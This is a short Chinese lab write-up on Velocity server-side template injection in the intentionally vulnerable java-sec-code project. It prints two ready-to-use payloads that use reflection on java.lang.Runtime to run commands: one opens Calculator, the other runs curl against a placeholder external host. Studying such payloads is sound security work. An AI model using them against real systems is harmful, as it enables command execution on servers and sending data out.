文章目录
- Java velocity
- SSTI
Java velocity
可以看一看这一篇文章
java velocity模板用法(替换、循环、if判断)《Velocity 模板使用指南》中文版
SSTI
SSTI模板注入啥的都很清楚了,我们这里看看代码,在org/joychou/controller/SSTI.java下面
![[Java-sec-code]Java velocity SSTI_java](https://file.cfanz.cn/uploads/png/2022/10/26/18/452c6N2a74.png "在这里插入图片描述")
接收参数template并解析
这里官方给了一个payload
#set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("open -a Calculator")
当然由于本身有context.put放入了一些参数,通过java.lang.String也可以
$address.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl http://xxxx?a=4s589")
![[Java-sec-code]Java velocity SSTI_4s_02](https://file.cfanz.cn/uploads/png/2022/10/26/18/0I654JH6Vb.png "在这里插入图片描述")
